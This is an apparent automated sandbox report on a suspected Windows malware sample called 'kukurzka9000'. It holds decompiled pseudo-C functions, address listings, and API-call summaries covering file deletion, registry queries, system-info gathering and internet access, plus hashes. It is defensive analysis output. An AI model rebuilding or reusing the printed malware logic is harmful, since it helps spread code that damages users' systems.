                                                                                                                                                                        					 *0x40e4a4(_v8);
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_t87);
                                                                                                                                                                        					 *0x40e4b0(_a8);
                                                                                                                                                                        					 *0x40e4a4(_v8);
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





























                                                                                                                                                                        0x00407220
                                                                                                                                                                        0x00407222
                                                                                                                                                                        0x004073c0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073c0
                                                                                                                                                                        0x00407235
                                                                                                                                                                        0x00407242
                                                                                                                                                                        0x00407253
                                                                                                                                                                        0x0040725c
                                                                                                                                                                        0x0040725e
                                                                                                                                                                        0x00407263
                                                                                                                                                                        0x00407268
                                                                                                                                                                        0x004073ab
                                                                                                                                                                        0x004073ac
                                                                                                                                                                        0x004073b2
                                                                                                                                                                        0x004073b3
                                                                                                                                                                        0x004073ba
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073ba
                                                                                                                                                                        0x00407274
                                                                                                                                                                        0x00407276
                                                                                                                                                                        0x00407277
                                                                                                                                                                        0x0040727c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407282
                                                                                                                                                                        0x0040728a
                                                                                                                                                                        0x0040728b
                                                                                                                                                                        0x00407292
                                                                                                                                                                        0x00407389
                                                                                                                                                                        0x0040738a
                                                                                                                                                                        0x00407392
                                                                                                                                                                        0x00407395
                                                                                                                                                                        0x00407395
                                                                                                                                                                        0x0040739d
                                                                                                                                                                        0x004073a0
                                                                                                                                                                        0x004073a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004073a8
                                                                                                                                                                        0x00407298
                                                                                                                                                                        0x004072ae
                                                                                                                                                                        0x004072b0
                                                                                                                                                                        0x004072b5
                                                                                                                                                                        0x00407361
                                                                                                                                                                        0x00407361
                                                                                                                                                                        0x00407364
                                                                                                                                                                        0x0040736f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072db
                                                                                                                                                                        0x004072e5
                                                                                                                                                                        0x004072e7
                                                                                                                                                                        0x004072f2
                                                                                                                                                                        0x004072f5
                                                                                                                                                                        0x004072fd
                                                                                                                                                                        0x00407300
                                                                                                                                                                        0x00407303
                                                                                                                                                                        0x0040730b
                                                                                                                                                                        0x00407312
                                                                                                                                                                        0x00407317
                                                                                                                                                                        0x0040731f
                                                                                                                                                                        0x00407321
                                                                                                                                                                        0x00407326
                                                                                                                                                                        0x00407329
                                                                                                                                                                        0x00407335
                                                                                                                                                                        0x0040733c
                                                                                                                                                                        0x00407341
                                                                                                                                                                        0x00407349
                                                                                                                                                                        0x0040734b
                                                                                                                                                                        0x00407350
                                                                                                                                                                        0x00407358
                                                                                                                                                                        0x0040735f
                                                                                                                                                                        0x0040735f
                                                                                                                                                                        0x00407335
                                                                                                                                                                        0x0040730b
                                                                                                                                                                        0x00407378
                                                                                                                                                                        0x00407381
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072bb
                                                                                                                                                                        0x004072bc
                                                                                                                                                                        0x004072c5
                                                                                                                                                                        0x004072ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004072d5

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004072BC
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407395
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073A0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073AC
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 004073B3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004073BA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
                                                                                                                                                                        • Instruction ID: e2ceee55462ef4f82933ad8064aef6a6fdd8d3625f281d360eeb473cc6bbcb89
                                                                                                                                                                        • Opcode Fuzzy Hash: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
                                                                                                                                                                        • Instruction Fuzzy Hash: C5419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 02399C12: LocalFree.KERNEL32(00000000,?,?,02391F22), ref: 02399C75
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396830
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 023968FE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396909
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396914
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396920
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 02396927
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239692E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2194112602-1731603023
                                                                                                                                                                        • Opcode ID: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
                                                                                                                                                                        • Instruction ID: ada1f1810a91f61f60c8b9fae9d2393ac1ed36ae40c2f062c5340c52b6d75149
                                                                                                                                                                        • Opcode Fuzzy Hash: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
                                                                                                                                                                        • Instruction Fuzzy Hash: 54416131601114AFDF199F66EE45E6D3BB9EF46320F104828E916E72A0DB74A911CF19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 00408523
                                                                                                                                                                        • InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004085F9
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408607
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040860E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CloseHandleInternetOpenlstrlen
                                                                                                                                                                        • String ID: pXet$qwrqrwrqwrqwr$y@
                                                                                                                                                                        • API String ID: 1588835542-1277124788
                                                                                                                                                                        • Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
                                                                                                                                                                        • Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,02398FE8,00000000,00000000,00000000,00000000,00000000), ref: 02398939
                                                                                                                                                                          • Part of subcall function 02399A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 02399A65
                                                                                                                                                                        • wsprintfW.USER32 ref: 02398957
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02398FE8,00000000), ref: 0239896F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02398FE8,00000000), ref: 02398976
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02398FE8,00000000,00000000,00000000,00000000,00000000), ref: 02398985
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02398FE8,00000000,00000000,00000000,00000000,00000000), ref: 0239898F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$ByteCharGlobalInfoMultiSystemWidewsprintf
                                                                                                                                                                        • String ID: @iet$pXet
                                                                                                                                                                        • API String ID: 2924325140-3425827899
                                                                                                                                                                        • Opcode ID: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
                                                                                                                                                                        • Instruction ID: 731245519997c150fbb44bba8bd7cd344db725db8d3801abc4b926dd05774e4d
                                                                                                                                                                        • Opcode Fuzzy Hash: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
                                                                                                                                                                        • Instruction Fuzzy Hash: 854182B1A002149FDB04CF69DDC496ABBF8EF49320B148579FE09EB351DA709D44CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
                                                                                                                                                                        • wsprintfW.USER32 ref: 0040916D
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000), ref: 00409185
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040918C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$lstrlen$CloseGlobalQueryValuewsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3289414791-1731603023
                                                                                                                                                                        • Opcode ID: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
                                                                                                                                                                        • Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e8d92e3f70d5fe38f1763d2356ae79cd52bc82e3d2d85c46ec5827371f6db32
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,02398FD6,00000000), ref: 023986B3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,02398FD6,00000000), ref: 023986BC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,02398FD6,00000000), ref: 023986CF
                                                                                                                                                                        • wsprintfW.USER32 ref: 023986E1
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000), ref: 023986F9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02398700
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$CloseGlobalQueryValuewsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 923078377-1731603023
                                                                                                                                                                        • Opcode ID: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
                                                                                                                                                                        • Instruction ID: 89243d186055b62ea8b9695c85798b469176b60fc16b6e494724d7f5d0621c43
                                                                                                                                                                        • Opcode Fuzzy Hash: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E115172600110BBE7149BA6ED49E6BBBBCEB4A754F104838F749F2161D7B19920CB78
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 21%
                                                                                                                                                                        			E0040ABD8(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				short _v32;
                                                                                                                                                                        				short _v36;
                                                                                                                                                                        				short _v38;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				short _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                        				void* _v116;
                                                                                                                                                                        				void* _v120;
                                                                                                                                                                        				short* _v144;
                                                                                                                                                                        				WCHAR* _v148;
                                                                                                                                                                        				char _v160;
                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                        				void* _t44;
                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				void* _t51;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				char _t55;
                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				void* _t98;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				intOrPtr* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v24 = __edx;
                                                                                                                                                                        				_v20 = __ecx;
                                                                                                                                                                        				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
                                                                                                                                                                        				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0);
                                                                                                                                                                        				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
                                                                                                                                                                        				if(_t44 >= 0) {
                                                                                                                                                                        					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        					_v48 = _t107;
                                                                                                                                                                        					_t47 =  *((intOrPtr*)( *0x40e144))(0x208, _t107);
                                                                                                                                                                        					_v64 = _t47;
                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						if(_v68 > 0) {
                                                                                                                                                                        							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t98 = 0x10;
                                                                                                                                                                        							_t53 = E0040A05F(_t51, _t98);
                                                                                                                                                                        							_v60 = _t53;
                                                                                                                                                                        							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
                                                                                                                                                                        							_t110 = _v68;
                                                                                                                                                                        							_t55 = E0040A503(_t54, _t110);
                                                                                                                                                                        							_t87 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        							_v80 = _t55;
                                                                                                                                                                        							_v88 = _t87;
                                                                                                                                                                        							_v84 = 0;
                                                                                                                                                                        							_t57 = E00408619( &_v80);
                                                                                                                                                                        							_v76 = _t57;
                                                                                                                                                                        							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
                                                                                                                                                                        								if(0 != 0) {
                                                                                                                                                                        									E00407EDB(_v144, _t118, 0, 0, _v164, _t78, _v148,  &_v160);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t118);
                                                                                                                                                                        							LocalFree(_v116);
                                                                                                                                                                        							LocalFree(_v120);
                                                                                                                                                                        							LocalFree(_t110);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t115 = 1;
                                                                                                                                                                        						L16:
                                                                                                                                                                        						LocalFree(_t78);
                                                                                                                                                                        						_t49 = _t115;
                                                                                                                                                                        						L17:
                                                                                                                                                                        						return _t49;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t119 = 0;
                                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t94 = _v56;
                                                                                                                                                                        					_t111 = _t107 + 0xfffffffc;
                                                                                                                                                                        					_t102 = _v64;
                                                                                                                                                                        					_t69 = _t94 - 6;
                                                                                                                                                                        					_v52 = _t69;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if(_t119 <= 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t102 = _v64;
                                                                                                                                                                        						if( *((intOrPtr*)(_t94 + _t119 * 2)) != 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v40 =  *_t69;
                                                                                                                                                                        						_v38 =  *_t111;
                                                                                                                                                                        						_v36 = 0;
                                                                                                                                                                        						_v32 = 0;
                                                                                                                                                                        						_t74 = E0040AE06( &_v40, _t78,  &_v68, _v44,  &_v40, _t73, _v48, 0);
                                                                                                                                                                        						_t123 = _t123 + 0x14;
                                                                                                                                                                        						if(_t74 < 0) {
                                                                                                                                                                        							_t115 = _t119 | 0xffffffff;
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t119 = _t119 + 1;
                                                                                                                                                                        						_t94 = _v56;
                                                                                                                                                                        						_t69 = _v52 + 2;
                                                                                                                                                                        						_t102 = _v64;
                                                                                                                                                                        						_t111 = _t111 + 2;
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t119 = _t119 + 3;
                                                                                                                                                                        						_t69 = _t69 + 6;
                                                                                                                                                                        						_t111 = _t111 + 6;
                                                                                                                                                                        						_v52 = _t69;
                                                                                                                                                                        					} while (_t119 < _t102);
                                                                                                                                                                        					goto L10;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t49 = LocalFree(_t78) | 0xffffffff;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}





















































                                                                                                                                                                        0x0040abef
                                                                                                                                                                        0x0040abfa
                                                                                                                                                                        0x0040abfe
                                                                                                                                                                        0x0040ac04
                                                                                                                                                                        0x0040ac13
                                                                                                                                                                        0x0040ac18
                                                                                                                                                                        0x0040ac1d
                                                                                                                                                                        0x0040ac42
                                                                                                                                                                        0x0040ac4a
                                                                                                                                                                        0x0040ac4e
                                                                                                                                                                        0x0040ac50
                                                                                                                                                                        0x0040ac56
                                                                                                                                                                        0x0040acee
                                                                                                                                                                        0x0040acf3
                                                                                                                                                                        0x0040ad05
                                                                                                                                                                        0x0040ad16
                                                                                                                                                                        0x0040ad1a
                                                                                                                                                                        0x0040ad1f
                                                                                                                                                                        0x0040ad31
                                                                                                                                                                        0x0040ad35
                                                                                                                                                                        0x0040ad37
                                                                                                                                                                        0x0040ad3f
                                                                                                                                                                        0x0040ad44
                                                                                                                                                                        0x0040ad4a
                                                                                                                                                                        0x0040ad50
                                                                                                                                                                        0x0040ad58
                                                                                                                                                                        0x0040ad5c
                                                                                                                                                                        0x0040ad6e
                                                                                                                                                                        0x0040ad7a
                                                                                                                                                                        0x0040ad8b
                                                                                                                                                                        0x0040ad8f
                                                                                                                                                                        0x0040ada6
                                                                                                                                                                        0x0040adaa
                                                                                                                                                                        0x0040adc4
                                                                                                                                                                        0x0040adc9
                                                                                                                                                                        0x0040adaa
                                                                                                                                                                        0x0040adcd
                                                                                                                                                                        0x0040add7
                                                                                                                                                                        0x0040ade1
                                                                                                                                                                        0x0040ade8
                                                                                                                                                                        0x0040ade8
                                                                                                                                                                        0x0040adf0
                                                                                                                                                                        0x0040adf1
                                                                                                                                                                        0x0040adf2
                                                                                                                                                                        0x0040adf8
                                                                                                                                                                        0x0040adfa
                                                                                                                                                                        0x0040ae00
                                                                                                                                                                        0x0040ae00
                                                                                                                                                                        0x0040ac5e
                                                                                                                                                                        0x0040ac62
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac68
                                                                                                                                                                        0x0040ac6c
                                                                                                                                                                        0x0040ac6f
                                                                                                                                                                        0x0040ac73
                                                                                                                                                                        0x0040ac76
                                                                                                                                                                        0x0040ac7a
                                                                                                                                                                        0x0040ac7c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac84
                                                                                                                                                                        0x0040ac88
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac91
                                                                                                                                                                        0x0040ac9b
                                                                                                                                                                        0x0040aca7
                                                                                                                                                                        0x0040acab
                                                                                                                                                                        0x0040acba
                                                                                                                                                                        0x0040acbf
                                                                                                                                                                        0x0040acc4
                                                                                                                                                                        0x0040ae01
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ae01
                                                                                                                                                                        0x0040acce
                                                                                                                                                                        0x0040accf
                                                                                                                                                                        0x0040acd3
                                                                                                                                                                        0x0040acd6
                                                                                                                                                                        0x0040acda
                                                                                                                                                                        0x0040acdd
                                                                                                                                                                        0x0040acdd
                                                                                                                                                                        0x0040ace0
                                                                                                                                                                        0x0040ace3
                                                                                                                                                                        0x0040ace6
                                                                                                                                                                        0x0040acea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ac7a
                                                                                                                                                                        0x0040ac26
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040AC20
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2826327444-1731603023
                                                                                                                                                                        • Opcode ID: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
                                                                                                                                                                        • Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
                                                                                                                                                                        • Opcode Fuzzy Hash: cb3fde234ea3763666557004fa5848a319dd513b55e0471afea34829c7d77506
                                                                                                                                                                        • Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239A194
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2826327444-1731603023
                                                                                                                                                                        • Opcode ID: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
                                                                                                                                                                        • Instruction ID: 235ab1f5f08a2d5492a7d4b12fb79984ad72442dc7e5dddbf204ebc6b1ed8920
                                                                                                                                                                        • Opcode Fuzzy Hash: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C51ADB1604311AFE714DF25DD44A3B76E9EBC9714F004A2DF9A9E7290EB70DD008B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02397A97
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397B6D
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02397B7B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02397B82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CloseHandlelstrlen
                                                                                                                                                                        • String ID: /$pXet$s
                                                                                                                                                                        • API String ID: 3009051031-438517066
